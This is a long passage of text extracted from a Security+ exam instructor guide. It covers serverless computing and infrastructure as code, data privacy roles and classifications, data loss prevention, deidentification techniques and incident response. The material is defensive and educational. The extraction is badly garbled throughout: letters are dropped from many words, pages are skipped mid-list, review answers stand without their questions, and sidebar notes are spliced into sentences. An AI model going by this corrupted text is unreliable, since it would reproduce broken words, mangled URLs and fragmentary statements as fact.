multiple servers for redundancy or load balancing. As all of the processing is taking
place within the cloud, there is little emphasis on the provision of a corporate network.
This underlying architecture is managed by the service provider. The principal
network security job is to ensure that the clients accessing the services have not been
compromised in a way that allows a malicious actor to impersonate a legitimate user.
This is a particularly important consideration for the developer accounts and devices
used to update the application code underpinning the services. These workstations
must be fully locked down, running no other applications or web code than those
necessary for development.
Serverless does have considerable risks. As a new paradigm, use cases and best
practices are not mature, especially as regards security. There is also a critical and
unavoidable dependency on the service provider, with limited options for disaster
recovery should that service provision fail.
Serverless architecture depends heavily on the concept of event-driven orchestration
to facilitate operations. or e ample, when a client connects to an application, multiple
services will be called to authenticate the user and device, identify the device location
and address properties, create a session, load authorizations for the action, use
application logic to process the action, read or commit information from a database,
and write a log of the transaction. This design logic is di erent from applications
written to run in a "monolithic" server-based environment. This means that adapting
e isting corporate software will re uire substantial development e ort.
The use of cloud technologies encourages the use of scripted approaches to Infrastructure as Code
provisioning, rather than manually making configuration changes, or installing patches.
An approach to infrastructure management where automation and orchestration fully
replace manual configuration is referred to as infrastructure as code (IaC).
ne of the goals of IaC is to eliminate snow ake systems. A snow ake is a
configuration or build that is di erent from any other. The lack of consistency or
drift—in the platform environment leads to security issues, such as patches that
have not been installed, and stability issues, such as scripts that fail to run because of Show Slide(s)
some small configuration di erence. y re ecting manual configuration of any kind,
IaC ensures idempotence. Idempotence means that making the same call with the oftware Defined
same parameters will always produce the same result. Note that IaC is not simply a Networking
matter of using scripts to create instances. Running scripts that have been written ad
hoc is ust as likely to cause environment drift as manual configuration. IaC means Teaching
using carefully developed and tested scripts and orchestration runbooks to generate Tip
consistent builds. You can refer students
to Cisco's website for
more information
o t are efined et or in about SDN (cisco.
com/c/en/us/
IaC is partly facilitated by physical and virtual network appliances that are fully solutions/software-
configurable via scripting and A Is. As networks become more comple perhaps defined networking
involving thousands of physical and virtual computers and appliances—it becomes overview.html).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
432 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
more difficult to implement network policies, such as ensuring security and managing
traffic ow. ith so many devices to configure, it is better to take a step back and
consider an abstracted model about how the network functions. In this model, network
functions can be divided into three "planes":
• Control plane makes decisions about how traffic should be prioriti ed and
secured, and where it should be switched.
• Data plane handles the actual switching and routing of traffic and imposition of
security access controls.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 433
• Edge gateways perform some pre-processing of data to and from edge devices
to enable prioritization. They also perform the wired or wireless connectivity to
transfer data to and from the storage and processing networks.
• The cloud or data center layer provides the main storage and processing resources,
plus distribution and aggregation of data between sites.
In security terms, the fog node or edge gateway layers represent high-value targets for
both denial of service and data e filtration attacks.
The controversy over the use of uawei s e uipment within G and edge networks illustrates
the risks and concerns over supply chains and trusted computing (threatpost.com/huawei-
g-security-implications 1 6).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
434 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Infrastructure as Code
Answer the following questions:
2. You have been asked to produce a summary of pros and cons for the
products Chef and Puppet. What type of virtualization or cloud computing
technology do these support?
5. What is SDV?
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 435
Lesson 15
Summary
You should be able to summarize virtualization and cloud computing concepts and Teaching
implement cloud security controls for compute, storage, and network functions. Tip
Check that students
Guidelines for Implementing Secure Cloud Solutions are confident about
the content that has
been covered. If there
ollow these guidelines for deploying or e tending use of cloud and virtuali ation
is time, revisit any
infrastructure: content examples that
• Assess re uirements for availability and confidentiality that will determine the they have questions
about. If you have
appropriate cloud deployment model (public, hosted private, private, community, used all the available
or hybrid . time for this lesson
block, note the issues,
• Identify a service provisioning model (software, platform, or infrastructure) that best
and schedule time for
fits the application re uirement, given available development resources and the a review later in the
degree of customization required. course.
• Consider whether the service or business need could be better supported by
advanced concepts:
• If using a CSP, create an SLA and security responsibility matrix to identify who
will perform security-critical tasks. Ensure that reporting and monitoring of cloud
security data is integrated with on-premises monitoring and incident response.
• If using on-premises virtualization or a private data center, ensure robust
procedures for developing and deploying virtual machines and protecting
hypervisor security.
• Configure native or third party security controls to protect cloud services
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 16
Explaining Data Privacy and
rotection oncepts
Lesson Objectives
In this lesson, you will:
• plain privacy and data sensitivity concepts.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
438 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 16A
Explain Privacy and Data
Sensiti ity oncepts
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 439
• Distribution use data is made available on a need to know basis for authori ed
uses by authenticated account holders and third parties.
• etention data might have to be kept in an archive past the date when it is still
used for regulatory reasons.
• Disposal when it no longer needs to be used or retained, media storing data assets
must be saniti ed to remove any remnants.
A data governance policy describes the security controls that will be applied to protect Data Roles and
data at each stage of its life cycle. There are important institutional governance roles Responsibilities
for oversight and management of information assets within the life cycle
• Data owner a senior e ecutive role with ultimate responsibility for maintaining
the confidentiality, integrity, and availability of the information asset. The owner is
responsible for labeling the asset such as determining who should have access and
determining the asset's criticality and sensitivity and ensuring that it is protected
with appropriate controls access control, backup, retention, and so forth . The
owner also typically selects a steward and custodian and directs their actions and
sets the budget and resource allocation for sufficient controls.
• Data steward this role is primarily responsible for data uality. This involves tasks
such as ensuring data is labeled and identified with appropriate metadata and that
data is collected and stored in a format and with values that comply with applicable
laws and regulations.
• Data custodian this role handles managing the system on which the data assets
are stored. This includes responsibility for enforcing access control, encryption, and
backup recovery measures.
In the conte t of legislation and regulations protecting personal privacy, the following
two institutional roles are important:
• Data controller the entity responsible for determining why and how data is
stored, collected, and used and for ensuring that these purposes and means are
lawful. The data controller has ultimate responsibility for privacy breaches, and is
not permitted to transfer that responsibility.
• Data processor an entity engaged by the data controller to assist with technical
collection, storage, or analysis tasks. A data processor follows the instructions of a
data controller with regard to collection or processing.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
440 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Data controller and processor tend to be organi ational roles rather than individual
ones. or e ample, if idget.foo collects personal data to operate a webstore on its
own cloud, it is a data collector and data processor. If Widget.foo passes aggregate
data to rommet.foo asking them to run profitability analytics for di erent customer
segments on its AI backed cloud, rommet.foo is a data processor acting under the
instruction of Widget.foo. Within the Grommet.foo and Widget.foo companies, the data
owner might take personal responsibility for the lawful performance of data controller
and processor functions.
• Critical top secret the information is too valuable to allow any risk of its capture.
iewing is severely restricted.
Using icrosoft Azure Information Protection to define an automatic document labeling and
watermarking policy. (Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 441
• ensitive This label is usually used in the conte t of personal data. rivacy
sensitive information about a person could harm them if made public and could
pre udice decisions made about them if referred to by internal procedures. As
defined by the 's eneral Data rotection egulations D , sensitive personal
data includes religious beliefs, political opinions, trade union membership, gender,
sexual orientation, racial or ethnic origin, genetic data, and health information
ec.europa.eu info law law topic data protection reform rules business and
organisations legal grounds processing data sensitive data what personal data
considered sensitive en .
A type schema applies a more detailed label to data than simple classification. Data Types
Customer Data
Customer data can be institutional information, but also personal information about
the customer's employees, such as sales and technical support contacts. This personal
customer data should be treated as II. Institutional information might be shared
under a nondisclosure agreement NDA , placing contractual obligations on storing and
processing it securely.
Health Information
Personal health information (PHI) or protected health information refers to
medical and insurance records, plus associated hospital and laboratory test results.
I may be associated with a specific person or used as an anonymi ed or deidentified
data set for analysis and research. An anonymi ed data set is one where the identifying
data is removed completely. A deidentified set contains codes that allow the sub ect
information to be reconstructed by the data provider.
I trades at high values on the black market, making it an attractive target. Criminals
seek to e ploit the data for insurance fraud or possibly to blackmail victims. I data is
e tremely sensitive and its loss has a permanent e ect. nlike a credit card number or
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
442 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
bank account number, it cannot be changed. Conse uently, the reputational damage
that would be caused by a I data breach is huge.
Financial Information
Financial information refers to data held about bank and investment accounts, plus
information such as payroll and ta returns. ayment card information comprises
the card number, e piry date, and the three digit card verification value C . Cards
are also associated with a IN, but this should never be transmitted to or handled by
the merchant. Abuse of the card may also re uire the holder's name and the address
the card is registered to. The ayment Card Industry Data ecurity tandard CI D
defines the safe handling and storage of this information pcisecuritystandards.org
pci security .
Government Data
Internally, government agencies have comple data collection and processing
re uirements. In the , federal laws place certain re uirements on institutions that
collect and process data about citizens and taxpayers. This data may be shared with
companies for analysis under strict agreements to preserve security and privacy.
Privacy Notices
Informed consent means that the data must be collected and processed only for
the stated purpose, and that purpose must be clearly described to the user in plain
language, not legalese. This consent statement is referred to as a privacy notice. Data
collected under that consent statement cannot then be used for any other purpose.
or e ample, if you collect an email address for use as an account ID, you may not send
marketing messages to that email address without obtaining separate consent for that
discrete purpose. Purpose limitation will also restrict your ability to transfer data to
third parties.
Impact Assessments
Tracking consent statements and keeping data usage in compliance with the consent
granted is a significant management task. In organi ations that process large amounts
of personal data, technical tools that perform tagging and cross referencing of
personal data records will be re uired. A data protection impact assessment is a
process designed to identify the risks of collecting and processing personal data in the
conte t of a business work ow or pro ect and to identify mechanisms that mitigate
those risks.
Data Retention
Data retention refers to backing up and archiving information assets in order to comply
with business policies and or applicable laws and regulations. To meet compliance
and e discovery re uirements, organi ations may be legally bound to retain certain
types of data for a specified period. This type of re uirement will particularly a ect
financial data and security log data. Conversely, storage limitation principles in privacy
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 443
legislation may prevent you from retaining personal data for longer than is necessary.
This can complicate the inclusion of II in backups and archives.
ome states and nations may respect data privacy more or less than others and Data overeignty
likewise, some nations may disapprove of the nature and content of certain data. They and Geographical
may even be suspicious of security measures such as encryption. hen your data is Considerations
stored or transmitted in other jurisdictions, or when you collect data from citizens in
other states or other countries, you may not "own" the data in the same way as you'd
e pect or like to.
Data Sovereignty
Data sovereignty refers to a urisdiction preventing or restricting processing and
storage from taking place on systems do not physically reside within that jurisdiction.
Data sovereignty may demand certain concessions on your part, such as using location
specific storage facilities in a cloud service.
or e ample, D protections are e tended to any citi en while they are within
or A uropean conomic Area borders. Data sub ects can consent to allow a
transfer but there must be a meaningful option for them to refuse consent. If the
transfer destination urisdiction does not provide ade uate privacy regulations to
a level comparable to D , then contractual safeguards must be given to e tend
D rights to the data sub ect. In the , companies can self certify that the
protections they o er are ade uate under the rivacy hield scheme privacyshield.
gov usinesses .
Geographical Considerations
eographic access re uirements fall into two di erent scenarios
• torage locations might have to be carefully selected to mitigate data sovereignty
issues. Most cloud providers allow choice of data centers for processing and
storage, ensuring that information is not illegally transferred from a particular
privacy urisdiction without consent.
• mployees needing access from multiple geographic locations. Cloud based file and
database services can apply constraint based access controls to validate the user's
geographic location before authorizing access.
A data breach occurs when information is read or modified without authori ation. rivacy reaches and
"Read" in this sense can mean either seen by a person or transferred to a network or Data reaches
storage media. A data breach is the loss of any type of data, while a privacy breach
refers specifically to loss or disclosure of personal and sensitive data. Teaching
Tip
Organizational Consequences Note that the
definition of a breach
A data or privacy breach can have severe organi ational conse uences can be quite narrow.
It is important to
• eputation damage data breaches cause widespread negative publicity, and review legislation
customers are less likely to trust a company that cannot secure its information and determine
assets. precise compliance
requirements.
• Identity theft if the breached data is e ploited to perform identity theft, the data
subject may be able to sue for damages.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
444 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• ines legislation might empower a regulator to levy fines. These can be fi ed sum
or in the most serious cases a percentage of turnover.
• I theft loss of company data can lead to loss of revenue. This typically occurs
when copyright material unreleased movies and music tracks is breached. The
loss of patents, designs, trade secrets, and so on to competitors or state actors can
also cause commercial losses, especially in overseas markets where I theft may be
difficult to remedy through legal action.
otifications o reaches
The re uirements for di erent types of breach are set out in law and or in regulations.
The re uirements indicate who must be notified. A data breach can mean the loss or
theft of information, the accidental disclosure of information, or the loss or damage of
information. Note that there are substantial risks from accidental breaches if e ective
procedures are not in place. If a database administrator can run a query that shows
unredacted credit card numbers, that is a data breach, regardless of whether the query
ever leaves the database server.
Escalation
A breach may be detected by technical sta and if the event is considered minor, there
may be a temptation to remediate the system and take no further notification action.
This could place the company in legal eopardy. Any breach of personal data and most
breaches of I should be escalated to senior decision makers and any impacts from
legislation and regulation properly considered.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 445
their organi ation for e ample, unauthori ed data sharing is e ectively a breach in
yours. Issues of security risk awareness, shared duties, and contractual responsibilities
can be set out in a formal legal agreement. The following types of agreements
are common
• ervice level agreement LA a contractual agreement setting out the detailed
terms under which a service is provided. This can include terms for security access
controls and risk assessments plus processing re uirements for confidential and
private data.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
446 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
ri acy and ata Sensiti ity oncepts
Answer the following uestions
1. hat is the di erence et een the role o data ste ard and the role o data
custodian?
The data steward role is concerned with the uality of data format, labeling,
normali ation, and so on . The data custodian role focuses on the system hosting the
data assets and its access control mechanisms.
ne set of tags could indicate the degree of confidentiality public, confidential secret,
or critical top secret . Another tagging schema could distinguish proprietary from
private sensitive personal data.
ersonally identifiable information is any data that could be used to identify, contact,
or locate an individual.
The site should add a privacy notice e plaining the purposes the personal information
is collected and used for. The form should provide a means for the user to give e plicit
and informed consent to this privacy notice.
Data and privacy breaches can lead legislators or regulators to impose fines. In some
cases, these fines can be substantial calculated as a percentage of turnover .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 447
Topic 16B
Explain Privacy and Data
rotection ontrols
Data stored within a trusted can be sub ect to authori ation mechanisms where Data rotection
the mediates access using some type of ACL. The presence of a trusted
cannot always be assumed, however. ther data protection mechanisms, notably Teaching
encryption, can be used to mitigate the risk that an authorization mechanism can Tip
be countermanded. When deploying a cryptographic system to protect data assets, Make sure students
consideration must be given to all the ways that information could potentially be can distinguish the
intercepted. This means thinking beyond the simple concept of a data file stored on a data states and the
disk. Data can be described as being in one of three states: di erent types of
encryption that can be
• Data at rest this state means that the data is in some sort of persistent used.
storage media. amples of types of data that may be at rest include financial
information stored in databases, archived audiovisual media, operational policies
and other management documents, system configuration data, and more. In this
state, it is usually possible to encrypt the data, using techniques such as whole
disk encryption, database encryption, and file or folder level encryption. It is
also possible to apply permissions access control lists ACLs to ensure only
authori ed users can read or modify the data. ACLs can be applied only if access to
the data is fully mediated through a trusted .
• Data in transit or data in motion this is the state when data is transmitted over
a network. amples of types of data that may be in transit include website traffic,
remote access traffic, data being synchroni ed between cloud repositories, and
more. In this state, data can be protected by a transport encryption protocol, such
as TL or I ec.
ith data at rest, there is a greater encryption challenge than with data in transit as the
encryption keys must be kept secure for longer. Transport encryption can use ephemeral
(session) keys.
• Data in use or data in processing this is the state when data is present in
volatile memory, such as system AM or C registers and cache. amples of
types of data that may be in use include documents open in a word processing
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
448 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
application, database data that is currently being modified, event logs being
generated while an operating system is running, and more. When a user works with
data, that data usually needs to be decrypted as it goes from in rest to in use. The
data may stay decrypted for an entire work session, which puts it at risk. owever,
trusted e ecution environment T mechanisms, such as Intel oftware uard
tensions software.intel.com content www us en develop topics software guard
e tensions details.html are able to encrypt data as it e ists in memory, so that an
untrusted process cannot decode the information.
While some of these mechanisms are simple to mitigate through the use of
security tools, others may be much less easily defeated. You can protect data using
mechanisms and security controls that you have e amined previously
• nsure that all sensitive data is encrypted at rest. If the data is transferred outside
the network, it will be mostly useless to the attacker without the decryption key.
• Create and maintain o site backups of data that may be targeted for destruction or
ransom.
• Restrict the types of network channels that attackers can use to transfer data from
the network to the outside. Disconnect systems storing archived data from the
network.
• Train users about document confidentiality and the use of encryption to store and
transmit data securely. This should also be backed up by and auditing policies
that ensure sta are trustworthy.
ven if you apply these policies and controls diligently, there are still risks to data from
insider threats and advanced persistent threat A T malware. Conse uently, a class of
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 449
security control software has been developed to apply access policies directly to data,
rather than ust the host or network on which data is located.
To apply data guardianship policies and procedures, smaller organizations might Data Loss revention
classify and type data manually. An organi ation that creates and collects large
amounts of personal data will usually need to use automated tools to assist with Interaction
this task, however. There may also be a re uirement to protect valuable intellectual Opportunity
property I data. Data loss prevention (DLP) products automate the discovery and Refer students to
classification of data types and enforce rules so that data is not viewed or transferred a vendor site for
without a proper authori ation. uch solutions will usually consist of the following more information
components: about specific DL
product features
• olicy server to configure classification, confidentiality, and privacy rules and and implementation
policies, log incidents, and compile reports. guidelines.
• ndpoint agents to enforce policy on client computers, even when they are not
connected to the network.
DL agents scan content in structured formats, such as a database with a formal access
control model or unstructured formats, such as email or word processing documents.
A file cracking process is applied to unstructured data to render it in a consistent
scannable format. The transfer of content to removable media, such as devices,
or by email, instant messaging, or even social media, can then be blocked if it does
not conform to a predefined policy. Most DL solutions can e tend the protection
mechanisms to cloud storage services, using either a pro y to mediate access or the
cloud service provider's A I to perform scanning and policy enforcement.
emediation is the action the DL software takes when it detects a policy violation. The
following remediation mechanisms are typical:
• Alert only the copying is allowed, but the management system records an incident
and may alert an administrator.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
450 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• lock the user is prevented from copying the original file but retains access to it.
The user may or may not be alerted to the policy violation, but it will be logged as an
incident by the management engine.
• uarantine access to the original file is denied to the user or possibly any user .
This might be accomplished by encrypting the file in place or by moving it to a
uarantine area in the file system.
• Tombstone the original file is uarantined and replaced with one describing the
policy violation and how the user can release it again.
• estrict printing and forwarding of documents, even when sent as file attachments.
Configuring a rights management template. (Screenshot used with permission from icrosoft.)
ights management is built into other secure document solutions, such as Adobe
Acrobat.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 451
Data minimization is the principle that data should only be processed and stored if rivacy nhancing
that is necessary to perform the purpose for which it is collected. In order to prove Technologies
compliance with the principle of data minimization, each process that uses personal
data should be documented. The work ow can supply evidence of why processing and Teaching
storage of a particular field or data point is re uired. Data minimi ation a ects the data Tip
retention policy. It is necessary to track how long a data point has been stored for since Make sure students
it was collected and whether continued retention supports a legitimate processing can use this
function. Another impact is on test environments, where the minimi ation principle terminology correctly.
forbids the use of real data records.
Counterintuitively, the principle of minimi ation also includes the principle of
sufficiency or ade uacy. This means that you should collect the data re uired for the
stated purpose in a single transaction to which the data sub ect can give clear consent.
Collecting additional data later would not be compliant with this principle.
Large data sets are often shared or sold between organi ations and companies,
especially within the healthcare industry. here these data sets contain II or
I, steps can be taken to remove the personal or identifying information. These
deidentification processes can also be used internally, so that one group within
a company can receive data for analysis without unnecessary risks to privacy.
Deidentification methods may also be used where personal data is collected to
perform a transaction but does not need to be retained thereafter. This reduces
compliance risk when storing data by applying minimi ation principles. or e ample,
a company uses a customer's credit card number to take payment for an order. When
storing the order details, it only keeps the final digits of the card as part of the
transaction log, rather than the full card number.
A fully anonymi ed data set is one where individual sub ects can no longer be
identified, even if the data set is combined with other data sources. Identifying
information is permanently removed. nsuring full anonymi ation and preserving the
utility of data for analysis is usually very difficult, however. Conse uently, pseudo
anonymization methods are typically used instead. Pseudo-anonymization modifies
or replaces identifying information so that reidentification depends on an alternate
data source, which must be kept separate. ith access to the alternated data, pseudo
anonymi ation methods are reversible.
It is important to note that given sufficient conte tual information, a data sub ect can
be reidentified, so great care must be taken when applying deidentification methods
for distribution to di erent sources. A reidentification attack is one that combines a
deidentified data set with other data sources, such as public voter records, to discover
how secure the deidentification method used is.
-anonymous information is data that can be linked to two or more individuals. This
means that the data does not unambiguously reidentify a specific individual, but there is a
significant risk of reidentification, given the value of . or example, if k , any group that
can be identified within the data set contains at least five individuals. IST has produced an
overview of deidentification issues, in draft form at the time of writing (csrc.nist.gov CS C
media Publications sp 00-1 draft documents sp 00 1 draft .pdf).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
452 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Data Masking
Data masking can mean that all or part of the contents of a field are redacted,
by substituting all character strings with for e ample. A field might be partially
redacted to preserve metadata for analysis purposes. or e ample, in a telephone
number, the dialing prefi might be retained, but the subscriber number redacted.
Data masking can also use techni ues to preserve the original format of the field. Data
masking is an irreversible deidentification techni ue.
Tokenization
Tokenization means that all or part of data in a field is replaced with a randomly
generated token. The token is stored with the original value on a token server or token
vault, separate to the production database. An authori ed uery or app can retrieve
the original value from the vault, if necessary, so tokeni ation is a reversible techni ue.
Tokenization is used as a substitute for encryption, because from a regulatory
perspective an encrypted field is the same value as the original data.
Aggregation/Banding
Another deidentification techni ue is to generali e the data, such as substituting a
specific age with a broader age band.
• As a storage method for data such as passwords where the original plainte t does
not need to be retained.
A salt is an additional value stored with the hashed data field. The purpose of salt is
to frustrate attempts to crack the hashes. It means that the attacker cannot use pre
computed tables of hashes using dictionaries of plainte ts. These tables have to be
recompiled to include the salt value.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 453
Review Activity:
ri acy and ata rotection ontrols
Answer the following uestions
This is typical of a data loss prevention DL policy replacing a file involved in a policy
violation with a tombstone file.
Tokeni ation replacing data with a randomly generated token from a separate token
server or vault. This allows reconstruction of the original data if combined with the
token vault.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
454 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 16
Summary
Teaching ou should be able e plain the importance of data governance policies and tools to
Tip mitigate the risk data breaches and privacy breaches and implement security solutions
Check that students for data protection.
are confident about
the content that has
been covered. If there Guidelines for Data Privacy and Protection
is time, revisit any
content examples that ollow these guidelines for creating or improving data governance policies and
they have uestions controls:
about. If you have
used all the available
• nsure that confidential and personal data is classified and managed using an
time for this lesson information life cycle model.
block, note the issues,
and schedule time for • Assign roles to ensure the proper management of data within the life cycle owners,
a review later in the custodians, stewards, controllers, processors, and privacy officers .
course.
• Develop classifications for confidential and personal information, based on standard
descriptors such as public, private, sensitive, confidential, critical, proprietary, II,
health information, financial information, and customer data.
• Make impact assessments for breach events and identify notification and reporting
requirements.
• Deploy a data loss prevention system that enforces sharing and distribution policies
to files and records across di erent transmission mechanisms file systems, email,
messaging, and cloud .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 17
Performing Incident Response
Lesson Objectives
In this lesson, you will:
• Summarize incident response procedures.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
456 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 17A
Summarize Incident
esponse rocedures
3. Containment—limit the scope and magnitude of the incident. The principal aim
of incident response is to secure data while limiting the immediate impact on
customers and business partners.
4. Eradication—once the incident is contained, remove the cause and restore the
a ected system to a secure state by applying secure configuration settings and
installing patches.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 457
Incident response is likely to require coordinated action and authorization from several
di erent departments or managers, which adds further levels of comple ity.
Preparing for incident response means establishing the policies and procedures Cyber Incident
for dealing with security breaches and the personnel and resources to implement Response Team
those policies.
ne of the first challenges lies in defining and categori ing types of incidents. An
incident is generally described as an event where security is breached or there is an
attempted breach. NI T describes an incident as the act of violating an e plicit or
implied security policy." In order to identify and manage incidents, you should develop
some method of reporting, categorizing, and prioritizing them (triage), in the same way
that troubleshooting support incidents can be logged and managed.
As well as investment in appropriate detection and analysis software, incident
response re uires e pert staffing. Large organi ations will provide a dedicated team as
a single point of contact for the notification of security incidents. This team is variously
described as a cyber incident response team (CIRT), computer security incident
response team (CSIRT), or computer emergency response team (CERT). Incident
response might also involve or be wholly located within a security operations center
C . owever it is set up, the team needs a mi ture of senior management decision
makers (up to director level) who can authorize actions following the most serious
incidents, managers, and technicians who can deal with minor incidents on their own
initiative.
Another important consideration is availability. Incident response will typically require
availability, which will be e pensive to provide. It is also worth considering that
members of the CIRT should be rotated periodically to preclude the possibility of
infiltration. or ma or incidents, e pertise and advice from other business divisions will
also need to be called upon:
• Legal it is important to have access to legal e pertise, so that the team can
evaluate incident response from the perspective of compliance with laws and
industry regulations. It may also be necessary to liaise closely with law enforcement
professionals, and this can be daunting without e pert legal advice.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
458 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Some organizations may prefer to outsource some of the CIRT functions to third-party
agencies by retaining an incident response provider. ternal agents are able to deal
more e ectively with insider threats.
Communication Plan
Secure communication between the trusted parties of the CIRT is essential for
managing incidents successfully. It is imperative that adversaries not be alerted to
detection and remediation measures about to be taken against them. It may not be
appropriate for all members of the CSIRT to be informed about all incident details.
The team re uires an out of band or o band communication method that cannot
be intercepted. Using corporate email or VoIP runs the risk that the adversary will
be able to intercept communications. One obvious method is cell phones but these
only support voice and te t messaging. or file and data e change, there should
be a messaging system with end to end encryption, such as the ecord T ,
ignal, or hatsApp, or an e ternal email system with message encryption MIM
or PGP). These need to use digital signatures and encryption keys from a system
that is completely separate from the identity management processes of the network
being defended.
Stakeholder Management
Trusted parties might include both internal and e ternal stakeholders. It is not helpful
for an incident to be publicized in the press or through social media outside of planned
communications. Ensure that parties with privileged information do not release this
information to untrusted parties, whether intentionally or inadvertently.
You need to consider obligations to report the attack. It may be necessary to inform
a ected parties during or immediately after the incident so that they can perform their
own remediation. It may be necessary to report to regulators or law enforcement. You
also need to consider the marketing and PR impact of an incident. This can be highly
Show Slide(s)
damaging and you will need to demonstrate to customers that security systems have
been improved.
Incident Response
Plan
Incident Response Plan
Teaching
Tip An incident response plan (IRP) lists the procedures, contacts, and resources
available to responders for various incident categories. The CSIRT should develop
Contrast specific
IRPs with the general profiles or scenarios of typical incidents DDo attack, virus worm outbreak, data
processes of incident e filtration by an e ternal adversary, data modification by an internal adversary, and
response. so on). This will guide investigators in determining priorities and remediation plans. A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 459
• cope the scope of an incident broadly the number of systems a ected is not a
direct indicator of priority. A large number of systems might be infected with a type
of malware that degrades performance, but is not a data breach risk. This might
even be a masking attack as the adversary seeks to compromise data on a single
database server storing top secret information.
• Detection time research has shown that the e istence of more than half of data
breaches are not detected for weeks or months after the intrusion occurs, while in
a successful intrusion data is typically breached within minutes. This demonstrates
that the systems used to search for intrusions must be thorough and the response
to detection must be fast.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
460 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
2. Weaponization—the attacker couples payload code that will enable access with
e ploit code that will use a vulnerability to e ecute on the target system.
7. Actions on ob ectives in this phase, the attacker typically uses the access he
has achieved to covertly collect information from target systems and transfer
it to a remote system data e filtration . An attacker may have other goals or
motives, however.
MITRE ATT&CK
As an alternative to the life cycle analysis implied by a kill chain, the MITRE
Corporation's Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK)
matrices provide access to a database of known TTPs. This freely available resource
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 461
(attack.mitre.org tags each techni ue with a uni ue ID and places it in one or more
tactic categories, such as initial access, persistence, lateral movement, or command
and control. The sequence in which attackers may deploy any given tactic category is
not made e plicit. This means analysts must interpret each attack life cycle from local
evidence. The framework makes TT s used by di erent adversary groups directly
comparable, without assuming how any particular adversary will run a campaign at a
strategic level.
There is a matri for enterprise, which can also be viewed as TT s directed against
Linu , mac , and indows hosts, and a second matri for mobile. or e ample, Drive
by Compromise is given the ID T and categori ed as an Initial Access tactic that
can target indows, Linu , and mac hosts. Clicking through to the page accesses
information about detection methods, mitigation methods, and e amples of historic
uses and analysis.
Intrusion event represented in the iamond odel. (Image eleased to public domain by
Sergio Caltagirone, Andrew Pendergast, and Christopher etz activeresponse.org wp-content
uploads/2013/07/diamond.pdf].)
The procedures and tools used for incident response are difficult to master and Incident Response
e ecute e ectively. ou do not want to be in the situation where first time sta ercises
members are practicing them in the high-pressure environment of an actual incident.
unning test e ercises helps sta develop competencies and can help to identify
deficiencies in the procedures and tools. Training on specific incident response
scenarios can use three forms:
